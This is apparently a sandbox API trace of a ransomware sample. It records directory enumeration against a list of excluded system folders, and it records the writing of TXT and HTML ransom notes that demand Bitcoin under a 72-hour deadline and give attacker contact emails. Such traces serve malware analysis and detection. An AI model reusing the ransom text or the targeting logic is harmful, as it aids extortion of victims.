	[0166.405] FindNextFileW (in: hFindFile=0xfb8ff0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x7cb3a0ad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.405] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0166.406] FindNextFileW (in: hFindFile=0xfb8ff0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cb3a0ad, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cb3a0ad, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cb600de, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0166.406] FindNextFileW (in: hFindFile=0xfb8ff0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cb3a0ad, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cb3a0ad, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cb3a0ad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0166.406] FindNextFileW (in: hFindFile=0xfb8ff0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cb3a0ad, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cb3a0ad, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cb3a0ad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0166.430] FindClose (in: hFindFile=0xfb8ff0 | out: hFindFile=0xfb8ff0) returned 1
	[0166.430] FindClose (in: hFindFile=0xfb8ff0 | out: hFindFile=0xfb8ff0) returned 0
	[0166.431] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShortcutBackups", cAlternateFileName="SHORTC~1")) returned 0
	[0166.431] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0166.431] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0166.431] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 0
	[0166.432] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0166.432] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0166.432] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1c4bfed4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1c4bfed4, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 1
	[0166.432] lstrcmpW (lpString1="UserData", lpString2="..") returned 1
	[0166.432] lstrcmpW (lpString1="UserData", lpString2=".") returned 1
	[0166.433] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun"
	[0166.433] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\"
	[0166.433] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\", lpString2="UserData" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData"
	[0166.433] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData"
	[0166.433] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\"
	[0166.433] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\"
	[0166.433] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*.*"
	[0166.433] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1c4bfed4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1c4bfed4, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.435] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*.*") returned 52
	[0166.436] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.436] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*.*", cchLength=0x34 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*") returned 0x34
	[0166.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.436] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="windows") returned 0x0
	[0166.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.436] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="boot") returned 0x0
	[0166.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.437] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="system volume information") returned 0x0
	[0166.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.437] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.438] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="temp") returned 0x0
	[0166.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.439] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="program files") returned 0x0
	[0166.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="appdata") returned 0x0
	[0166.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="application data") returned 0x0
	[0166.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="winnt") returned 0x0
	[0166.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="tmp") returned 0x0
	[0166.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="cache") returned 0x0
	[0166.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="webcache") returned 0x0
	[0166.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="inetcache") returned 0x0
	[0166.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="nvidia") returned 0x0
	[0166.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="packages") returned 0x0
	[0166.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="cookies") returned 0x0
	[0166.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="programdata") returned 0x0
	[0166.443] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1c4bfed4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1c4bfed4, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.443] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1c4bfed4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1c4bfed4, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0166.444] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0166.444] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0166.444] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData"
	[0166.444] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*.*"
	[0166.444] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.445] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.445] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\HELP_DECRYPT_YOUR_FILES.TXT") returned 76
	[0166.445] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\userdata\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.446] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0166.446] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0166.449] CloseHandle (hObject=0x388) returned 1
	[0166.450] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.450] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.450] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0166.452] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0166.452] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\userdata\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.452] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0166.452] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0166.452] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0166.453] CloseHandle (hObject=0x388) returned 1
	[0166.454] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.454] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.455] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0166.455] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\HELP_DECRYPT_YOUR_FILES.HTML") returned 77
	[0166.455] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\userdata\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.455] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0166.455] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0166.458] CloseHandle (hObject=0x388) returned 1
	[0166.459] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.459] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.460] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.460] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0166.461] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.461] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\userdata\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.462] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0166.462] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.462] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0166.462] CloseHandle (hObject=0x388) returned 1
	[0166.463] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1c4bfed4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x7cbf8cdc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.463] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*.*") returned 52
	[0166.463] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.464] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*.*", cchLength=0x34 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*") returned 0x34
	[0166.464] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.464] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="windows") returned 0x0
	[0166.464] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.464] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="boot") returned 0x0
	[0166.464] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.465] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="system volume information") returned 0x0
	[0166.465] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.465] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.465] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.465] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="temp") returned 0x0
	[0166.465] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.465] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="program files") returned 0x0
	[0166.465] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.466] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.466] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="appdata") returned 0x0
	[0166.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.466] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="application data") returned 0x0
	[0166.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.466] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="winnt") returned 0x0
	[0166.467] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.467] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="tmp") returned 0x0
	[0166.467] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.467] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="cache") returned 0x0
	[0166.467] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.467] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.467] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.468] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="webcache") returned 0x0
	[0166.468] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.468] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="inetcache") returned 0x0
	[0166.468] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.468] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="nvidia") returned 0x0
	[0166.468] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.506] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="packages") returned 0x0
	[0166.506] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.506] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="cookies") returned 0x0
	[0166.506] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
